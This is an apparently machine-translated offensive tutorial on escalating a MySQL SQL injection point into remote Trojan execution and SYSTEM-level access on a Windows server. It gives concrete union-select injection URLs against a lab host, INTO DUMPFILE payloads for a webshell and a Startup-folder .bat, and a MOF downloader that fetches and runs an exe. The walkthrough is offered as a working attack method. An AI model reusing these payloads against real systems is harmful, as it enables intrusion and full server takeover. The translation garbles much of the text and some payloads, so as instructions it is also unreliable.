Mysql injection point remote Trojan (no web physical path/non-root permission)

Mysql injection point remote Trojan (no web physical path/non-root permission)

When there are injection points in the Application Scenario, but the physical path cannot be exposed, this method can be used to obtain server permissions if the file export conditions are met. In practice, the operator x has encountered an injection point, which is not the root permission but can read and write files... no web physical path (cannot directly use shell) Mysql File Export condition 1 Root permission (in fact, not root is not available, with insert permission) 2 writable directory (even system permission, cannot be written with driver restrictions): Whether using sqlmap injection to write shell or execute commands, you must provide a web physical path. What if there is no path?


K8bbs injection vulnerability environment as an example (starting with shell and then exporting exe Trojan Files) injection point: http: // 192.168.85.142/php/k8bbs/news. php? Id = 3 and 1 = 2 union select 1, user (), 3, 4, 5



Export webshell (everyone knows) http: // 192.168.85.142/php/k8bbs/news. php? Id = 3 and 1 = 2 union select 1, 2, 3, 4, unhex ('hour') into dumpfile 'C:/AAWServer/www/php/k82.php ';


After the exported webshell content, we can see that the exported content contains 1234 in front of this sentence, which is a good condition for webshell. What if the exported binary file is used? For example, if the cmd.exe file is exported, it is definitely useless. Of course, another situation also causes shell to fail to run. What should I do if php termination code appears in the field? Therefore, if we want to improve the performance, it is best to ensure that the original webshell content is exported to 0x00. The actual result is changed to null, which is the same as that of webshell, but the executable files such as exe and bat are


Exporting arbitrary files is segmented and merged according to the principle described at the beginning, which perfectly solves the problem of improving payload and finding that the specified content is successfully exported here. we have solved the problem of injection point exporting arbitrary files http: // 192.168.85.142/php/k8bbs/news. php? Id = 3 and 1 = 2 union select 0x3C3F, 0x7068,0x7020,0x4065, unhex ('weight') into dumpfile 'C:/AAWServer/www/php/k82.php ';


Export the bat file to the startup Item bat to download the file or perform any operations. If the file is soft, an alarm will be reported... this is also one of the defects of this method: http: // 192.168.85.142/php/k8bbs/news. php? Id = 3 and 1 = 2 union select 0x6E, 0x65,0x74,0x20, cannot into dumpfile 'C: /Documents and Settings/All Users/Start Menu/Programs/Startup/k8.bat ';


Mysql injection methods

1. Export hta vbs bat exe to wait for the startup Item or to load the script. This method requires the target machine to restart... if the administrator cannot restart the server, it will be ineffective. If there is a software kill on the server, the exported executable file is estimated to be intercepted directly.

2. scheduled tasks (the script for local configuration test is not valid if it is thrown to the target machine)

3. UDF Elevation of Privilege (conditional execution of functions such as create can execute commands). Sometimes, the injection point length limit cannot be used to export the entire udf.

4 (perfect solution to the defects of the above three methods ,)

MOF Privilege Escalation

1. The mof Elevation of Privilege on the Internet is a defect where JavaScript code is used to execute commands. Adding a user Elevation of Privilege cannot be completed in a script.

The problem cannot be solved after the study... We found that echo and so on did not output the results to the specified directory...

2. In practice, this is the case of an inject. You need to solve this problem by executing the mof command to obtain the target information... so I thought about reading and writing js files... this is indeed feasible, but it hurts to execute multiple commands in the same script.

3. Baidu was just the script for adding users. When he was disappointed, he suddenly thought of vbs.

When I think of the IE shidong of MS14065, we have already completed VBS FTP downloading and HTTP downloading.

Yes, vbs is called in mof, which solves several problems... execute multiple commands and inject the dot and Trojan to quickly generate and export Arbitrary File payload.

The number of fields in different injection points is unknown, and the file content to be converted is different.

To export different files through the injection point, hex content must be split, Which is troublesome and error-prone.

In addition, in order to improve work efficiency, the one-click splitting file HEX content function is added to the flying knife.

Example tutorial (next page of the image) injection point: http: // 192.168.85.142/php/k8bbs/news. php? Id = 3 and 1 = 2 union select 1, user (), 3, 4, 5 Export shell payload http: // 192.168.85.142/php/k8bbs/news. php? Id = 3 and 1 = 2 union select 0x3C3F, 0x7068,0x7020,0x4065, unhex ('weight') into dumpfile 'C:/AAWServer/www/php/k82.php '; replace all fields with nullhttp: // 192.168.85.142/php/k8bbs/news. php? Id = 3 and 1 = 2 union select null, null into dumpfile 'C:/AAWServer/www/php/k82.php ';

Put the encoding and decoding module in the flying knife, right-click and select the payload content --- encoding conversion --- File/File -- Mysql inject Output option to bring up the File selection dialog box (select the File you want to export) --- OK, you can automatically generate the padyload code to export the corresponding file for the user.

Select the downexec. mof file in the Apsara stack-Mysql elevation directory and modify the exe address. Click Open.


The converted payload is as follows. executing this code will export our mof downloader on the target machine.


If the MOF script is correct, the mof script in the C: \ WINDOWS \ system32 \ wbem \ MOF \ good directory will be moved to C: \ WINDOWS \ system32 \ wbem \ mof \ bad directory about 20 seconds C: \ WINDOWS \ Temp will also show our specified exe ..


In the testing environment, Win2003 was launched, and the SYSTEM permission was not implemented. Switching to the user's remote control screen control would be completely black. Part of the cmd function would also be affected by the system permission, you can do anything without the maximum permission...

For example, a company has strict permission distribution... the manager is only responsible for management... the property is made by the people below... some passwords are managed by the people below. You have control of the manager and cannot directly do anything... you still need to downgrade... or give the following instructions to do those things .... for details, refer to the tutorial on Windows permission system released by K8... provides a tool to switch the admin Operation from system to system.